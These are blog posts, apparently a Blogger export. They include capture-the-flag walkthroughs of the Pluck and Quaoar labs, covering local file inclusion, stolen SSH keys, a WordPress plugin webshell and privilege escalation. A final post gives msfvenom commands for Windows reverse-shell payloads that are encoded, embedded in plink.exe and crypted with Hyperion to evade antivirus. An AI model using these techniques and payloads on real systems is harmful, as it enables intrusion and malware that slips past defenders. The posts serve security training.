I have executed URL from exploit<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR7oLlOjweOH9EC1v0w7WGw2-5-9antgad0fkjAUgUYGtWjCusea8QvNBEq8rpMV19YFiVKWc94Qa83TDNfwgJnUViKytFDeDG-fIGpbWb_mBoc8VHDr9j50_tPPu4PvE5jQ0cnLuY-M/s1600/exp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipR7oLlOjweOH9EC1v0w7WGw2-5-9antgad0fkjAUgUYGtWjCusea8QvNBEq8rpMV19YFiVKWc94Qa83TDNfwgJnUViKytFDeDG-fIGpbWb_mBoc8VHDr9j50_tPPu4PvE5jQ0cnLuY-M/s640/exp.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
I have created new file named <b>exploit.html</b> which contains part of content of our exploit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mTAT70In4s6xtx_76o2vrlKxIHnOTwbkHnTdEh7nRAmD1b6_KEU6mMYvdEEsXzEsuRUm_HggwzQON_IFASKzDdQ3TatMhBTtxXGas2qFH85xDbrcQ70d8_3oGTnus1SQC7a9SVn9lUQ/s1600/exploit.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2mTAT70In4s6xtx_76o2vrlKxIHnOTwbkHnTdEh7nRAmD1b6_KEU6mMYvdEEsXzEsuRUm_HggwzQON_IFASKzDdQ3TatMhBTtxXGas2qFH85xDbrcQ70d8_3oGTnus1SQC7a9SVn9lUQ/s640/exploit.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I have run apache server and execute our exploit. So I have uploaded PHP Reverse Shell file named shell.php.<br />
Now, we have to find our backdoor.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-mpdPz4DrX-wDAzwTCIPNfVDhgqAK5h1422lQ3fizwkdeNcBjk_RJwROKmmhmTrC0LAyPg_XXq864SzxuAxX-7X2EJPbHM327YTA0xxGJCmfYp2Chy_zQ5jYVtOvwbT_xuxFsLFOXOM/s1600/asdas.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr-mpdPz4DrX-wDAzwTCIPNfVDhgqAK5h1422lQ3fizwkdeNcBjk_RJwROKmmhmTrC0LAyPg_XXq864SzxuAxX-7X2EJPbHM327YTA0xxGJCmfYp2Chy_zQ5jYVtOvwbT_xuxFsLFOXOM/s400/asdas.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Our shell is uploaded, now let's execute it.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW24auX7juGhv9KxF2LKXIixLcsMfMXsWx_FzqTtkxTQdfr_V6lPTBJnZMFhq2ZGYCf5-DTJn2BZlCDk7JjA7mM6ffaXTZwXFSzqYIhEkXsumhhaeqKTB_TbMoiXq4kr6PXbSIXZHErWk/s1600/shell.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiW24auX7juGhv9KxF2LKXIixLcsMfMXsWx_FzqTtkxTQdfr_V6lPTBJnZMFhq2ZGYCf5-DTJn2BZlCDk7JjA7mM6ffaXTZwXFSzqYIhEkXsumhhaeqKTB_TbMoiXq4kr6PXbSIXZHErWk/s640/shell.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have got limited shell!<br />
<br />
TBUrgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-37518442889870773542017-03-21T09:47:00.000+01:002017-03-21T09:47:10.874+01:00Pluck challengeHello,<br />
<br />
Let's start the challenge.<br />
<br />
Nmap scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhArOYqOt0s0EXfh0t_d2p4JNFU9LbWZMHixBPORVZRykmtFs7LqhTiZL0DhPdJN1jdMV6GXqkM712jlGoAq501_Mp8xJCQPtWrKyh6vTxCg7SDQd2ZcGGp-0HhC0MOSONCljwPKaLhgY4/s1600/nmap.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhArOYqOt0s0EXfh0t_d2p4JNFU9LbWZMHixBPORVZRykmtFs7LqhTiZL0DhPdJN1jdMV6GXqkM712jlGoAq501_Mp8xJCQPtWrKyh6vTxCg7SDQd2ZcGGp-0HhC0MOSONCljwPKaLhgY4/s400/nmap.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
OK, we discovered four open ports. Let's begin, as always, from web application.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS6Puk7yhAt_U-SpB0KpXK-QXajg_O-7vwmjmRsyFvj8SGL0MWzS3EnGb1wHAsvZwKEU_tL2nDOWtVqy11NJ5ef3zddDXVMLBRyvxCmKhc25Llt_U2biK7DfsFmnU_Oj7VpG53izDZpv4/s1600/pluck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgS6Puk7yhAt_U-SpB0KpXK-QXajg_O-7vwmjmRsyFvj8SGL0MWzS3EnGb1wHAsvZwKEU_tL2nDOWtVqy11NJ5ef3zddDXVMLBRyvxCmKhc25Llt_U2biK7DfsFmnU_Oj7VpG53izDZpv4/s320/pluck.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So, let's penetrate the web application deeper. We can see also that on the dashboard is link to admin panel.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMtA0Sn1rmiBZ9uH7Xt6xbOqk98Hn8I4hI0CX9UPk7APstbZ-CMOLkqIH8M6olRJVYc7iS1AV6ew5psswjDaBBAz1MJt6xtUTlRn496d-n5BYVSalyy23YflsKZshO84r_tzO9s8Ay_9w/s1600/passwd.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMtA0Sn1rmiBZ9uH7Xt6xbOqk98Hn8I4hI0CX9UPk7APstbZ-CMOLkqIH8M6olRJVYc7iS1AV6ew5psswjDaBBAz1MJt6xtUTlRn496d-n5BYVSalyy23YflsKZshO84r_tzO9s8Ay_9w/s320/passwd.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Good, we discovered LFI. We can see very interesting information from /etc/passwd. I mean<br />
<blockquote class="tr_bq">
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
</blockquote>
Let's try display content of the file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguBbYZir8HnKvUrl5tFtWbiJAOmdeOBg9Yyv5BXJcyEHY6Wpbj0h6NdMU-bDrbaz0XZQAB8zdNGboasXDf123SrkCWi1nEqsVGPYyTch4HJVscTrrA7lwvWE-cuIXkGug79frZwfpIguE/s1600/backup.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguBbYZir8HnKvUrl5tFtWbiJAOmdeOBg9Yyv5BXJcyEHY6Wpbj0h6NdMU-bDrbaz0XZQAB8zdNGboasXDf123SrkCWi1nEqsVGPYyTch4HJVscTrrA7lwvWE-cuIXkGug79frZwfpIguE/s320/backup.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We know that out target hosts TFTP service and if we could connect to the TFTP we will be able to (probably) download /backups/backup.tar file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmZvN44ASHCXdPa71u7ZNRXQvkgg0RcXhMkN1qe8FuVgRTCsNFP70I3xMkMDDjgZU-_GU-MZbj7kVs48Zwpi7_GW8J-6t656Rh6_Wu3WJ6I6VzsBOkbuODWwB4nQ6BuUFSL8hG769ei4/s1600/tfto.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFmZvN44ASHCXdPa71u7ZNRXQvkgg0RcXhMkN1qe8FuVgRTCsNFP70I3xMkMDDjgZU-_GU-MZbj7kVs48Zwpi7_GW8J-6t656Rh6_Wu3WJ6I6VzsBOkbuODWwB4nQ6BuUFSL8hG769ei4/s320/tfto.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Let's examine what is <b>backup.tar</b> file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYo_EqBwXOulqo_vgUQAQevXjVQZDKbwFsSkkU8vUAqdMvrpcEjz7F93gxShyphenhyphen_PKYLB1HmTD8zwFP2vZvKbgk4sgIApgtocnMMXC9260mLr-8R6P0e-mByOI8ti-akB-KWbNRiiofPh8/s1600/www.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqYo_EqBwXOulqo_vgUQAQevXjVQZDKbwFsSkkU8vUAqdMvrpcEjz7F93gxShyphenhyphen_PKYLB1HmTD8zwFP2vZvKbgk4sgIApgtocnMMXC9260mLr-8R6P0e-mByOI8ti-akB-KWbNRiiofPh8/s320/www.png" width="203" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, as far as I know the file is a backup of /var/www/html/* and /home/* files! In particular in /home/* we will be able to find some SSH keys.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWEryqIujhHF0kd_M0an4E0VoU8FGzDZnRRAVh8ex7mFSPSDO-PfL6iK12mCH3VOWWXJ33WOSV1_S897pbDlcwY_JC4M9OnDoxbFXZbjhzTr5gQSxxQtXSJ7zokXdEhGpvosTK3NPVTbs/s1600/keys.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWEryqIujhHF0kd_M0an4E0VoU8FGzDZnRRAVh8ex7mFSPSDO-PfL6iK12mCH3VOWWXJ33WOSV1_S897pbDlcwY_JC4M9OnDoxbFXZbjhzTr5gQSxxQtXSJ7zokXdEhGpvosTK3NPVTbs/s320/keys.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Awesome! Using <b>id_key4</b>, we have got following screen<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGUgjlwvwaKFdDRkrpCkj434YzCiad6STpI5-SW83A6DwFP8VMrdmotY6BD3Sw3PODjUjMqxE-s_u-KuDznlSXDLtNSgZhZBCsSJEy4UwyElR68qwgNSY4Q2VQ8ljsXGv4JCB1Dmm214o/s1600/kuku.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="259" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiGUgjlwvwaKFdDRkrpCkj434YzCiad6STpI5-SW83A6DwFP8VMrdmotY6BD3Sw3PODjUjMqxE-s_u-KuDznlSXDLtNSgZhZBCsSJEy4UwyElR68qwgNSY4Q2VQ8ljsXGv4JCB1Dmm214o/s320/kuku.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Editting, via Edit file, /home/paul/keys/id_key1.pub, we are able to connect to paul's shell using vim trick - <b>:set shell=/bin/bash</b> and <b>:shell</b>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyWEmwEgwU0ECrGA01EG32ioKKFiAVCBc354UVFRQxaQWC3Hb6MCFbOI_UFXiHJwNjfuXspAENKNicrMDLssEcD8akcmAZjY4EvTy5ORPQ7rgEKDvweE3Lurj7PWs6Aw4269Ewgpk9jXY/s1600/puck.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyWEmwEgwU0ECrGA01EG32ioKKFiAVCBc354UVFRQxaQWC3Hb6MCFbOI_UFXiHJwNjfuXspAENKNicrMDLssEcD8akcmAZjY4EvTy5ORPQ7rgEKDvweE3Lurj7PWs6Aw4269Ewgpk9jXY/s320/puck.png" width="320" /></a></div>
<br />
<br />
<br />
Excellent! We have got limited shell! We can see that Linux Kernel is 4.8 and we can find valid local privileges explioit.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbv1Ftq7YQlV1uU5wdHdWfffu1C0olbwkQb79YsPrr2um-_WWX21rSu9qiCKevuSkm-ig2HwgtbGvj-mvSmwb1n8k_32xue_FrOPhxW59RE3hvUGlavBEAbQ6UKuYJ6n7RbGJ1E6VxS8/s1600/cowroto.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvbv1Ftq7YQlV1uU5wdHdWfffu1C0olbwkQb79YsPrr2um-_WWX21rSu9qiCKevuSkm-ig2HwgtbGvj-mvSmwb1n8k_32xue_FrOPhxW59RE3hvUGlavBEAbQ6UKuYJ6n7RbGJ1E6VxS8/s320/cowroto.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Very good! We are root!<br />
<br />
Game over<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-9839293748530096992017-03-20T11:22:00.001+01:002017-03-20T11:24:17.609+01:00hackfest2016: QuaoarHello everyone!<br />
<br />
Today I would like to present to you the hackfest2016 Quaoar walkthrough :)<br />
<br />
Nmap scanning<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDQDxANsCZGLpimxPlPYbaVLLttuX53tFqq81EIfVuxgF5fMbqrTWRccTYt1nukpef6ac0em786fwAu1KLCJQy0G4gLuKtGuVknOetp2ocvZRo8ZaEGh-EbRX_0x0oyTwZBPJIyov1GPs/s1600/Screenshot+from+2017-03-20+10-09-03.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="130" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDQDxANsCZGLpimxPlPYbaVLLttuX53tFqq81EIfVuxgF5fMbqrTWRccTYt1nukpef6ac0em786fwAu1KLCJQy0G4gLuKtGuVknOetp2ocvZRo8ZaEGh-EbRX_0x0oyTwZBPJIyov1GPs/s400/Screenshot+from+2017-03-20+10-09-03.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Wow, there is bunch of open ports.<br />
<br />
I started from Samba enumeration, but I didn't find something interesting except information about samba version (3.6.3).<br />
<br />
So I decided to try find something within the web application.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvWXIfJlyLe2To50XG9X2pvwpzCDN8fD53ccmP-7uY8RQdEyMKUa71pXswRu-WKcl1dfhMMeHXbIQb7rM1mdy5qd37t__iJ1ct7dsxd1l2zkVbvlMeAzKtrFcGgs1ayx2MqNbavE2SfT0/s1600/web.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvWXIfJlyLe2To50XG9X2pvwpzCDN8fD53ccmP-7uY8RQdEyMKUa71pXswRu-WKcl1dfhMMeHXbIQb7rM1mdy5qd37t__iJ1ct7dsxd1l2zkVbvlMeAzKtrFcGgs1ayx2MqNbavE2SfT0/s400/web.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Dirbuster found some helpful (?) paths.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9UXYf19Ojmuwwv5FiucY-ULXyVBLdfy2Hck26pnthWN85obFlbhY18U0hqNZL-8zb7qdQ8s9DWkxE-dm9U7YlosWwqWUlb50iZMIcP9ajGTCNTmjcV089VcDhUDM-h_rxv0Upt19M28/s1600/dirbuster.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEii9UXYf19Ojmuwwv5FiucY-ULXyVBLdfy2Hck26pnthWN85obFlbhY18U0hqNZL-8zb7qdQ8s9DWkxE-dm9U7YlosWwqWUlb50iZMIcP9ajGTCNTmjcV089VcDhUDM-h_rxv0Upt19M28/s400/dirbuster.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now, we know that the web application utilizes a wordpress CMS. So, if we can know username from posts on the websites, we will be able to use wpscan to try bruteforce this user's password.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmHE4wjsD0JpUJRkilsxqK9mb3IQecUxqMc6C-H2G7noHnle1fYkAq9PZdAEmaiuvHFm6nZkPT2icrtMkyT8JoMoy1Ch_HphcbMGgWbGzTyM_nCRBgkaqUPCd_7L1yCcCJuHZOYV4gbIg/s1600/wp-login.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjmHE4wjsD0JpUJRkilsxqK9mb3IQecUxqMc6C-H2G7noHnle1fYkAq9PZdAEmaiuvHFm6nZkPT2icrtMkyT8JoMoy1Ch_HphcbMGgWbGzTyM_nCRBgkaqUPCd_7L1yCcCJuHZOYV4gbIg/s400/wp-login.png" width="333" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
After admin:admin attemption - success!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIMLnR0ADZfbhifLg1m8Ig6KtyXIKxmIYDfpVgXF0W78EfCcsXCma4d_pEXL9BGYeXvx-xwkhEMJi7pUseG9K6nhLGxLROvzL0mY384cjQ8NcmD7BkZt5MkK-mxQPdqJPYBKfVJCt-tA/s1600/admin_wp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="179" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKIMLnR0ADZfbhifLg1m8Ig6KtyXIKxmIYDfpVgXF0W78EfCcsXCma4d_pEXL9BGYeXvx-xwkhEMJi7pUseG9K6nhLGxLROvzL0mY384cjQ8NcmD7BkZt5MkK-mxQPdqJPYBKfVJCt-tA/s400/admin_wp.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Excellent! Let's try edit some plugin or something like that and upload reverse php shell..<br />
I had edited existing Plugin - Aksimet and I activaed it.<br />
I executed appropriate path to run our uploaded webshell.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vGYi39H64NKcdH6NTFPLpQiVcSR31LaeIIrrttxDPxVWBvKAprLlU6VTcr8YduCT5RiOWuEE3kwuWh0YAl5RXxtR__oIbfaDZXy5BBE7MqMdfpq7ftGJW7qwmTaZDtUxfptWRXnHeuI/s1600/spawn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vGYi39H64NKcdH6NTFPLpQiVcSR31LaeIIrrttxDPxVWBvKAprLlU6VTcr8YduCT5RiOWuEE3kwuWh0YAl5RXxtR__oIbfaDZXy5BBE7MqMdfpq7ftGJW7qwmTaZDtUxfptWRXnHeuI/s400/spawn.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Amazing, we have got limited shell. Now, we have to escalate our privileges.<br />
I went to <b>/var/www/wordpress</b> and I found there <b>config</b> file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QN8mRpzQCgQUw0apFS_-C6nsCpR51UesoDEojY-slAoHFq5MctVUAZxQnAiVG53M_OdzIoUOM2oSE7iqE-Vs8v9DS-Mn_ybx9q7KkLW53q3b9wKBHF1eVCLHmAdEQZh1sazIXJDoG-8/s1600/config.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6QN8mRpzQCgQUw0apFS_-C6nsCpR51UesoDEojY-slAoHFq5MctVUAZxQnAiVG53M_OdzIoUOM2oSE7iqE-Vs8v9DS-Mn_ybx9q7KkLW53q3b9wKBHF1eVCLHmAdEQZh1sazIXJDoG-8/s400/config.png" width="400" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Great! We have valid MySQL credentials. So, let's exploit it.<br />
Hmmm rootpassword! maybe will be also valid for Linux root?<br />
BINGO!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQ7JvARgKMOyQGvOjIQjplbgTN1MusB25fN8iDKZCykjTOIFbyK7iu5OxOBIbP0lAZw79ZGseqT5MqWxN1WYHMhk74CW8nuaFVuzsImhW7fl3e3QQO59b4yGtAoeRg3OpxXsxDFtyYpY/s1600/root_fglag.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFQ7JvARgKMOyQGvOjIQjplbgTN1MusB25fN8iDKZCykjTOIFbyK7iu5OxOBIbP0lAZw79ZGseqT5MqWxN1WYHMhk74CW8nuaFVuzsImhW7fl3e3QQO59b4yGtAoeRg3OpxXsxDFtyYpY/s320/root_fglag.png" width="320" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Game over!<br />
<br />
<br />
<br />rgolebiowskihttp://www.blogger.com/profile/06575754454762912759noreply@blogger.comtag:blogger.com,1999:blog-3159890562902717913.post-76192740116994664712017-03-10T10:15:00.001+01:002017-03-10T10:15:32.804+01:00VirusTotal challengeHello everyone,<br />
<br />
Today I would like to present several methods of antivirus mechanisms evasion.<br />
<br />
Within this article I will use couple tools such as: metasploit, shellter, veil-evasion.<br />
<br />
Conclusion of the article will be comparison of efficiency generated payloads.<br />
<br />
1. Metasploit Framework<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -o shell_reverse.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFQkcTjZKz7Ih1E5EPwNeB6_CxYt1y_A63juqu4jPe6PtSDpDL2QDPApY0jNfzH_HV6k5PuW1LnZm3NJLLiVL99DMqVxMhp_zrZEN6dtLY7WKvnlnI5speYUX7f-oIgUpjBECgVvpcvRQ/s1600/zwykly.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="423" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFQkcTjZKz7Ih1E5EPwNeB6_CxYt1y_A63juqu4jPe6PtSDpDL2QDPApY0jNfzH_HV6k5PuW1LnZm3NJLLiVL99DMqVxMhp_zrZEN6dtLY7WKvnlnI5speYUX7f-oIgUpjBECgVvpcvRQ/s640/zwykly.png" width="640" /></a></div>
I think that it is so potty result - 43/59 AV verified that our paylaod is malicious.<br />
<br />
Let's try generate the same payload but with encoding<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR4MyOqgjNTaarelvgtgMFwF753RbJzI3IMQ5a3zp8P7TA8G204G7sAuzBrJTQPk64dvQIJ1BFtLtOaxW4Pu8kY5lDGheQ982P38KfNdIvOtNUkkD1mK4d2_GqAtOlJ2xpdCOdSuqJa4E/s1600/encodowany.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="415" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR4MyOqgjNTaarelvgtgMFwF753RbJzI3IMQ5a3zp8P7TA8G204G7sAuzBrJTQPk64dvQIJ1BFtLtOaxW4Pu8kY5lDGheQ982P38KfNdIvOtNUkkD1mK4d2_GqAtOlJ2xpdCOdSuqJa4E/s640/encodowany.png" width="640" /></a></div>
The same potty result.<br />
<br />
Now, let's try inject our malicious payload into other program.<br />
<ul>
<li>msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$port -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJT-jpLR1_AoLI6hi742hVOE4llt8eG_M1M4iU3wJMqTkOLYr5nZjQyXMn4hb-reWhvoYSXhRYyJbI5ZeQo_LkO-8sRUFRHcCcmW4Aswenq0LYoV488SK_WMKBkutYfTH_aqtyBvKEzVk/s1600/incject.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="425" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJT-jpLR1_AoLI6hi742hVOE4llt8eG_M1M4iU3wJMqTkOLYr5nZjQyXMn4hb-reWhvoYSXhRYyJbI5ZeQo_LkO-8sRUFRHcCcmW4Aswenq0LYoV488SK_WMKBkutYfTH_aqtyBvKEzVk/s640/incject.png" width="640" /></a></div>
Better, but still it isn't suit us.<br />
<br />
<ul>
<li>cp shell_reverse_msf_encoded_embedded.exe backdoor.exe<br />cp /usr/share/windows-binaries/Hyperion-1.0.zip .<br />unzip Hyperion-1.0.zip<br />cd Hyperion-1.0/<br />i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe<br />cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .<br />cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .<br />wine hyperion.exe ../backdoor.exe ../crypted.exe</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiZinHpAulaU4UllCjekCt1gxrSIoLQpBjp5c9O4KpCMYsOw6Zr4gbtxZtbrrnOhIMV1g7zMc4VssCxTgzWO9yO_uTvbRYFbMmQ2YFCZUpJzYQkjoJGG040HPBhjFgwHp0fqR4EJJXcBA/s1600/hyperion.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="370" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiZinHpAulaU4UllCjekCt1gxrSIoLQpBjp5c9O4KpCMYsOw6Zr4gbtxZtbrrnOhIMV1g7zMc4VssCxTgzWO9yO_uTvbRYFbMmQ2YFCZUpJzYQkjoJGG040HPBhjFgwHp0fqR4EJJXcBA/s640/hyperion.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
